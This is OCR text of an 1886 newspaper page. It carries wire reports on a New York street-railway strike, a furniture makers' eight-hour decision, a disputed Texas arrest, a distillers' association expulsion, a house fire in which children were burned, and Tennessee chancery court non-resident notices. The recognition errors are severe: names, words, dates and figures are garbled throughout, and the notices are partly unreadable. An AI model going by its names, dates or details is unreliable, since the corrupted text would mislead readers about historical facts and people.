th s has called for Mr. Berth's interference. The citiaens of New York need fiar no violence from our men. X; :n bnt our pickets will bs allowed ou Third av enue nmil t.11 trouble is sjttltKi. Pick e'swillbe on dutv day and night lrom tbe Citv Halt to Harlem tridge, snd w:ll report ti hesdqnsrters every hour. Aboat 2r0 pickets are on duty at one time, under command of a most reliable man, with fif eea ae sistantp, and thev are relieved every five hurs. The picket who finds one cf our men on the avenue will t.iks him in charge and pus him on frem onH to another nmil he reaches tho hall." Ail w.is quiet at midnight. Will I angorate the Btjateiav Chicago. III.. April 11. One of the largest meetings of furniture manu facturer s ever held in toe uniteu 8la.es was in session here to-day. Delegates were present from Illinois, Michigi'n. Wisions'n, Minnesota, Iowa, Indiana rnd Kentucky. Over 160 firms were represented, it was de cided to inaugurate the eight-hour system, commencing May 15th, snd at the same time make an advance of 10 per cent, on the prices of ell kinds oi furniture. AN EXTRAORDINARY AHREST. The Officer la ttlHpnte Over a Pris oner. San Antonio, Tex , Aprii;22. A. N. Towr.s, whose extiardinary arrest on Tuesday almost at the same moment by two c 111 cars known to each other, ou charges of having committed two murders many years ego, was laxen 10 Hill county, Tex , where be will be tried for killing Thomas Woods six years ago.. Sheriff B?U and Detective Hughes had much d fficnlty in decid ing which should take the prisoner. The detective grabbed Towcs first. He bed an extradition warrant from Oov. Ireland permitting him to take the prisoner to Mississip pi, but the Texae sheriff threatened to ask the Governor to withdraw the warrant, and thu secured the pris oner. Towns declares that he can e'ear bin-self in both caees, as he acted in salf defeDS?. The prisoner took a decided interest in the dispute be tween the officeis for his possession. Ue suggested that tbey toss a copper, and there is a strong sospUion that the matter was actually settled in that way to avoid a quanet.' lhe Whlaky Meav ' Chicago, III , April 22. The West ern Export Aisiciation to-day con cluded its rr.eet nz here. Out of a total of ninety o-?e distiller', seventy one were present. The association by a unanimons vote expelled Edward Spellman, the proprietor of the Enter prife distillery at Pekin, III. The charges ag- insi bim were refusing to pay his afsef-smen-'P, making up more bushels of grain than he was entitled to, end violating the wii'tsn cgreeraetnt made with the association. It was also resolved to huetain no bueioess rela- tious with b stoufe or any house that purchased gools from him. It was deefded that, price? and overs should remain as fcteretofnre. Children Bo rand Dralb. West Newton, Pa , April 22. While Mrj. Albert Neff was planting vegetables in the garden th's morning the honse caught fire, and before she could rescie her four childrn, who were sleeping up stairf,Vhey were ter ribly burned. Two of the little ones are reported sinking rapidly and are expaeti d to die et any moment. on-ReiJent Notice. No. 6CHU, H. D.-In the Chanoery Court of : bhelby county, Tnn. Sutia ol Tennease . T8. Taylor Abernatby ; et al. it appearing from allegation of toe bill in thia oaua". which ia w.rn tu, that the de fendant. MraW F liardin and Willidine Hardin, K T Brorbaa, Harriet Bell, uean W Cheek, William K Flowera, Jane J .Lam beraon, Uavid McKay, Milet M Kobinaon, Win J Robinaon, haaan w Robinunn, S D Roaaeli ani wife, Ophelia Roaaell, WinDeld btnkea, Helen Srhmeilor, John Story, mra f arh T.ahe and Miss Harah Tigbe. plaoea of reiidenoe are unknown to eomplairiant and cannot be ascertained upon diligent inquiry made, and that the Metropolitan National Kunknf vewVork ie a aon-reaidcat ot tbe State ot Tennea-ee: It ia therefore orddred, That taey make tl oir appearance horem, t the Ccurt-llouaa of Shelby county, m Meuipbia, lenn., on or before the first Monday in June, A.D-, 1. end plead, anowor or demur to miuplin ant'a bill, or the Mine will be tabeu tor con t'eisoi aa to Ihoin o4 aet for hearing el parte ; and that a rovy "f hi o: der be pub liah'd om-e a week for four au"oivc weeks in the Mempaia Arpeal- 'ihii al d ot April, lSSfi. A copv A ttot : S. I. M.'IMWELL. Clerk and Maiter. Ty II. F. 'A'a'sh, Deputy C. and M. -lohn Jor-mton. Sol lorcn.pl nt.- aat HI. I.onl Stove Monldera TrnnMea. St. L cis, Mo., April 22. The mem beis o! the loc:-l Htove Moulders' Union eoxe time ago t'emandej cf their empl.ivers sn aJvunce in waej of 15 per cent. Two of the foundries seceded to their demand, and the management ot the o'.bers succeeded in averting a strike of their employes, l.set night at a nipoiing c the union Soa-Keaident Notice. Ito. 61i7, R. D.-In tho Chancery fourt ot Sheloy Cor nty. Tenn.-iitnte of Tenrea- iee va. Mary A lirenetl. It aptwarieg froiu allogntioni of lhe h II in this caua. wii.rh i rn to, that he de fendants, 1 M DuUoFc.JohB . LuilH teuton. L . U H'.pm Tni,l. H J PtrlllPa are non-reai.li.nla ot the titate of Tennea'ee, and tbu the ilace ol resiui'uco ui i nor end wim. tlayaor, i unknowa aaa cannot te ace:Uined upon dil-gent laquirj It ia therefore ordered, Th-t they make their si pearunce l erein, st the leurt-lloufe of tihelby countv. in Memp.iia. P"r belortlthe Oral sion-jsy iu uue, " ai d i,l-d,anweTordimartroniplainnl J bill, or lhe ame will he laen for ennfesjed aa to Ihem and aet for he-mug ei Pr'e: tha. a copy of thie order be l ublisbed once a week for tour a: ecejaive weka m tbe p'ala Appeal. Thie 2l day of April, U. .; A s'1M rPOWELL, Clerk and Maater. ' Ty H. F. Walah, Uepury C. and M. John Jobtn, f -ro"io('l ut. xml | txt
http://chroniclingamerica.loc.gov/lccn/sn84024448/1886-04-23/ed-1/seq-4/ocr/
CC-MAIN-2016-40
refinedweb
7,845
71.34
Hi All, I am assuming camel uses Xerces2-J to do xml validation. If I am on the right track so far, - might be an issue for some. At the end of this issue, it says that In Xerces 2.7.0 we defined a new feature called. When this feature is set to true, all schema location hints will be used to locate the components for a given target namespace, so if there are multiple imports for the same namespace Xerces will access all of the schema locations provided. So I am wondering how can I enable this feature when I am writing a route. My route is Thanks, Mohit Edited by: mhanda on Aug 24, 2010 6:01 AM You can always validate the message from Java code yourself if a Camel component seems not to do what you want. You may be able to set features to Xerces using Java System Properties or someway like that. You can check the Xerces documentation for that. AFAIR there is not specific Xerces options avail on the Camel validator component. But if you show how to enable this feature in Xerces we could consider adding some feature so you can easily set it from the Camel component.
https://developer.jboss.org/thread/245660
CC-MAIN-2017-51
refinedweb
207
78.08
29779/hyperledger-unexpected-forbidden-implicit-threshold-policies When i run ./byfn.sh -m up I get this error: Error: got unexpected status: FORBIDDEN -- Failed to reach implicit threshold of 1 sub-policies, required 1 remaining : permission denied Did you try ./byfn.sh -m down as mentioned in the answer? That solved the problem for me! Try and then Failed to reach implicit threshold of 1 sub-policies, required 1 remaining : permission denied While creating channel I have faced the same issue So there may be two resolution for that : 1] Either your previous network volume is not purged or deleted so just run the command docker volume prune and delete all the data in crypto-config and channel-artifacts folder.Follow the Hyperledger Fabric docs either create artifacts manually and start network or use byfn.sh. This will resolve the issue if not then follow the second approach 2] Repository is not accessible(rd/wt permissions) so just give the access "sudo chmod 777 dir" I have your problem too, PLEASE HELP ...READ MORE As your .hfc-key-store directory is in chaindev, Try running the following ...READ MORE This error happens because basic-network/docker-compose.yaml has CA ...READ MORE Try remove previous docker containers(have mentioned the ...READ MORE Summary: Both should provide similar reliability of ...READ MORE This will solve your problem import org.apache.commons.codec.binary.Hex; Transaction txn ...READ MORE To read and add data you can ...READ MORE You can extend your /etc/hosts file and make orderer.example.com domain name ...READ MORE Seems like you have not set the ...READ MORE OR Already have an account? Sign in.
https://www.edureka.co/community/29779/hyperledger-unexpected-forbidden-implicit-threshold-policies?show=29780
CC-MAIN-2021-21
refinedweb
278
58.89
/**************************************************************************** ** ** "mediaplayer.h" int main (int argc, char *argv[]) { Q_INIT_RESOURCE(mediaplayer); QApplication app(argc, argv); app.setApplicationName("Media Player"); app.setOrganizationName("Qt"); app.setQuitOnLastWindowClosed(true); bool hasSmallScreen = #ifdef Q_OS_SYMBIAN /* On Symbian, we always want fullscreen. One reason is that it's not * possible to launch any demos from the fluidlauncher due to a * limitation in the emulator. */ true #else false #endif ; QString fileString; const QStringList args(app.arguments()); /* We have a minor problem here, we accept two arguments, both are * optional: * - A file name * - the option "-small-screen", so let's try to cope with that. */ for (int i = 0; i < args.count(); ++i) { const QString &at = args.at(i); if (at == QLatin1String("-small-screen")) hasSmallScreen = true; else if (i > 0) // We don't want the app name. fileString = at; } MediaPlayer player(fileString, hasSmallScreen); if (hasSmallScreen) player.showMaximized(); else player.show(); return app.exec(); }
https://doc.qt.io/archives/qt-4.7/demos-qmediaplayer-main-cpp.html
CC-MAIN-2021-17
refinedweb
143
52.97
QML state changes on double click - bluestreak Hi all, I am trying to build a touch screen of tabs, which when the central part of the screen in double clicked on, goes to a new state where there are two identical tab displays up instead of only seeing one. However, this never seems to happen. Can anyone see something wrong with this implementation? @ import QtQuick 1.1 Item { width: 1540 height: 320 MouseArea{ id: mouseArea x: 0 y: 58 width: 1540 height: 262 anchors.rightMargin: 0 anchors.bottomMargin: 0 anchors.leftMargin: 0 anchors.topMargin: 58 anchors.fill: parent } Tabs { width: 1540 height: 320 id: tabs } Tabs { id: tabs1 x: 0 y: 0 width: 770 height: 320 } states: [ State { name: "State1"; when: mouseArea.doubleClicked PropertyChanges { target: tabs width: 770 height: 320 } PropertyChanges { target: tabs1 x: 770 y: 0 width: 770 height: 320 } } ] } @ - bluestreak For anyone interested, I was able to fix this by using onDoubleClicked within the mouseArea tag, and then having that change a property bool. Using mouseArea.doubleClicked like above doesn't work. Solution: @ property bool twoScreens: false MouseArea{ id: mouseArea onDoubleClicked: twoScreens = !twoScreens } states: [ State { name: "State1"; when: twoScreens @ The reason is that "doubleClicked" is a signal, not a property. The "when" property of a State, is of type Binding which expects the result of the binding expression to be boolean.
https://forum.qt.io/topic/18113/qml-state-changes-on-double-click
CC-MAIN-2017-34
refinedweb
223
73.88
Instance variable initializers - C# vs. VB.NET I ran into an interesting issue today when changing some VB.NET code. I was surprised at the outcome so I did a quick repro case in C# and didn't have a problem. Given this simple C# app, the results are pretty easy to predict: using System; namespace InheritIssue { class Class1 { [STAThread] static void Main(string[] args) { Foo f = new Foo(); } } public class Base { private int _data; public Base() { Init(); } protected virtual void Init() { _data = 1; Console.WriteLine("Data initialized to " + _data); } } public class Foo : Base { private Alpha a = new Alpha(); public Foo() : base() { Console.WriteLine("hello"); } protected override void Init() { base.Init(); Console.WriteLine("Initial Age: " + a.Age); } } public class Alpha { private int _age = -1; public int Age { get { return _age; } set { _age = value; } } } } In case you don't feel like running the code, you'll get: Data initialized to 1 Initial Age: -1 hello Now the same code in VB.NET: Option Strict On Option Explicit On Namespace InheritIssue Public Class Class1 <STAThread()> _ Shared Sub Main() Dim f As Foo = New Foo End Sub Public Class Base Private _data As Integer Public Sub New() Init() End Sub Protected Overridable Sub Init() _data = 1 Console.WriteLine("Data initialized to " & _data) End Sub End Class Public Class Foo Inherits Base Private a As Alpha = New Alpha Public Sub New() MyBase.New() Console.WriteLine("hello") End Sub Protected Overrides Sub Init() MyBase.Init() Console.WriteLine("Initial Age: " & a.Age) End Sub End Class Public Class Alpha Private _age As Integer = -1 Public Property Age() As Integer Get Return _age End Get Set(ByVal Value As Integer) _age = Value End Set End Property End Class End Class End Namespace This code gets to the Base class initializer and outputs "Data initialized to 1". It then throws a NullReferenceException trying to access the Age property of the "a" object. The "a" variable has not been initialized and is still null (Nothing). I thought this was odd so I checked out the IL for Foo's constructor in both the C# and VB.NET version and saw something noticeably different. In C#, the ctor is: .method public hidebysig specialname rtspecialname instance void .ctor() cil managed { // Code size 28 (0x1c) .maxstack 2 IL_0000: ldarg.0 IL_0001: newobj instance void InheritIssue.Alpha::.ctor() IL_0006: stfld class InheritIssue.Alpha InheritIssue.Foo::a IL_000b: ldarg.0 IL_000c: call instance void InheritIssue.Base::.ctor() IL_0011: ldstr "hello" IL_0016: call void [mscorlib]System.Console::WriteLine(string) IL_001b: ret } // end of method Foo::.ctor In VB.NET, there's an ever-so-slight difference: .method public specialname rtspecialname instance void .ctor() cil managed { // Code size 28 (0x1c) .maxstack 8 IL_0000: ldarg.0 IL_0001: call instance void InheritIssue.Class1/Base::.ctor() IL_0006: ldarg.0 IL_0007: newobj instance void InheritIssue.Class1/Alpha::.ctor() IL_000c: stfld class InheritIssue.Class1/Alpha InheritIssue.Class1/Foo::a IL_0011: ldstr "hello" IL_0016: call void [mscorlib]System.Console::WriteLine(string) IL_001b: ret } // end of method Foo::.ctor C# initialized the "a" variable to a new instance of Alpha before calling the base ctor. VB.NET did not do this. So when the Init method is called in Foo(), "a" is still null in the VB.NET version and you get a NullReferenceException. I checked the Visual Basic Language Specification for instance constructors and it states:. Emphasis added by me. Now checking the C# spec: When an instance constructor has no constructor initializer, or it has a constructor initializer of the form base(...), that constructor implicitly performs the initializations specified by the variable-initializers of the instance fields declared in its class. This corresponds to a sequence of assignments that are executed immediately upon entry to the constructor and before the implicit invocation of the direct base class constructor. The variable initializers are executed in the textual order in which they appear in the class declaration. Whoa! Important difference there (very different!). I wonder why the language designers chose such a different path on deciding when to intialize instance variables?
https://weblogs.asp.net/psteele/438840
CC-MAIN-2018-22
refinedweb
669
59.19
hi all, i know there is a code like childrenRecursive gives back a list of all the childs of the object and the childs of the child but if i want to know the parent of a child which code i have to use? for example i have a cube and a sphere and the sphere is the children of the cube if i write: import bge sc = bge.logic.getCurrentScene() ob = sc.objects cube = ob[“Cube”] sphere = ob[“Sphere”] child_list = cube.childrenRecursive i will get a list of the childs of the cube but if i want to know the parent of the sphere? i tried to find something on web but nothing… thx for help edit: hum maybe i posted in wrong place sorry
https://blenderartists.org/t/how-to-know-parent-object/594443
CC-MAIN-2021-04
refinedweb
126
85.02
#include <sys/ddi.h> #include <sys/sunddi.h> int devmap_devmem_setup(devmap_cookie_t dhp, dev_info_t *dip, struct devmap_callback_ctl *callbackops, uint_t rnumber, offset_t roff, size_t len, uint_t maxprot, uint_t flags, ddi_device_acc_attr_t *accattrp); int devmap_umem_setup(devmap_cookie_t dhp, dev_info_t *dip, struct devmap_callback_ctl *callbackops, ddi_umem_cookie_t cookie, offset_t koff, size_t len, uint_t maxprot, uint_t flags, ddi_device_acc_attr_t *accattrp); Solaris DDI specific (Solaris DDI). devmap_devmem_setup() parameters: An opaque mapping handle that the system uses to describe the mapping. Pointer to the device's dev_info structure. Pointer to a devmap_callback_ctl(9S) structure. The structure contains pointers to device driver-supplied functions that manage events on the device mapping. The framework will copy the structure to the system private memory. Index number to the register address space set. Offset into the register address space. Length (in bytes) of the mapping to be mapped. Maximum protection flag possible for attempted mapping. Some combinations of possible settings are: Read access is allowed. Write access is allowed. Execute access is allowed. User-level access is allowed. The mapping is done as a result of a mmap(2) system call. All access is allowed. Used to determine the cache attribute. Possible values of the cache attribute are: The CPU can cache the data it fetches and push it to memory at a later time. This is the default attribute that is used if no cache attributes are specified. The CPU never caches the data, but writes can occur out of order or can be combined. Reordering is implied. If IOMEM_DATA_UC_WR_COMBINE is specified but not supported, IOMEM_DATA_UNCACHED is used instead. The CPU never caches data, but has uncacheable access to memory. Strict ordering is implied. The cache attributes are mutually exclusive. Any combination of the values leads to a failure. On the SPARC architecture, only IOMEM_DATA_CACHED is meaningful. Others lead to a failure.. devmap_umem_setup() parameters: An opaque data structure that the system uses to describe the mapping. Pointer to the device's dev_info structure. Pointer to a devmap_callback_ctl(9S) structure. The structure contains pointers to device driver-supplied functions that manage events on the device mapping. A kernel memory cookie (see ddi_umem_alloc(9F)). Offset into the kernel memory defined by cookie. Length (in bytes) of the mapping to be mapped. Maximum protection flag possible for attempted mapping. Some combinations of possible settings are: Read access is allowed. Write access is allowed. Execute access is allowed. User-level access is allowed (the mapping is being done as a result of a mmap(2) system call). All access is allowed. Must be set to 0. Pointer to a ddi_device_acc_attr(9S) structure. Ignored in the current release. Reserved for future use. The devmap_devmem_setup() and devmap_umem_setup() functions are used in the devmap(9E) entry point to pass mapping parameters from the driver to the system. The dhp argument specifies a device mapping handle that the system uses to store all mapping parameters of a physical contiguous memory. The system copies the data pointed to by callbackops to a system private memory. This allows the driver to free the data after returning from either devmap_devmem_setup() or devmap_umem_setup(). The driver is notified of user events on the mappings via the entry points defined by devmap_callback_ctl(9S). The driver is notified of the following user events: User has called mmap(2) to create a mapping to the device memory. User has accessed an address in the mapping that has no translations. User has duplicated the mapping. Mappings are duplicated when the process calls fork(2). User has called munmap(2) on the mapping or is exiting, exit (2). See devmap_map(9E), devmap_access(9E) , devmap_dup(9E), and devmap_unmap (9E) for details on these entry points. By specifying a valid callbackops to the system, device drivers can manage events on a device mapping. For example, the devmap_access(9E) entry point allows the drivers to perform context switching by unloading the mappings of other processes and to load the mapping of the calling process. Device drivers may specify NULL to callbackops which means the drivers do not want to be notified by the system. The maximum protection allowed for the mapping is specified in maxprot. accattrp defines the device access attributes. See ddi_device_acc_attr (9S) for more details. devmap_devmem_setup() is used for device memory to map in the register set given by rnumber and the offset into the register address space given by roff. The system uses rnumber and roff to go up the device tree to get the physical address that corresponds to roff. The range to be affected is defined by len and roff. The range from roff to roff + len must be a physical contiguous memory and page aligned. Drivers use devmap_umem_setup() for kernel memory to map in the kernel memory described by cookie and the offset into the kernel memory space given by koff. cookie is a kernel memory pointer obtained from ddi_umem_alloc(9F). If cookie is NULL, devmap_umem_setup() returns -1. The range to be affected is defined by len and koff. The range from koff to koff + len must be within the limits of the kernel memory described by koff + len and must be page aligned. Drivers use devmap_umem_setup() to export the kernel memory allocated by ddi_umem_alloc(9F) to user space. The system selects a user virtual address that is aligned with the kernel virtual address being mapped to avoid cache incoherence if the mapping is not MAP_FIXED. Successful completion. An error occurred. devmap_devmem_setup() and devmap_umem_setup() can be called from user, kernel, and interrupt context. exit(2), fork(2), mmap(2), munmap(2), devmap(9E), ddi_umem_alloc(9F), ddi_device_acc_attr(9S), devmap_callback_ctl (9S) Writing Device Drivers for Oracle Solaris 11.2
http://docs.oracle.com/cd/E36784_01/html/E36886/devmap-devmem-setup-9f.html
CC-MAIN-2015-11
refinedweb
927
51.24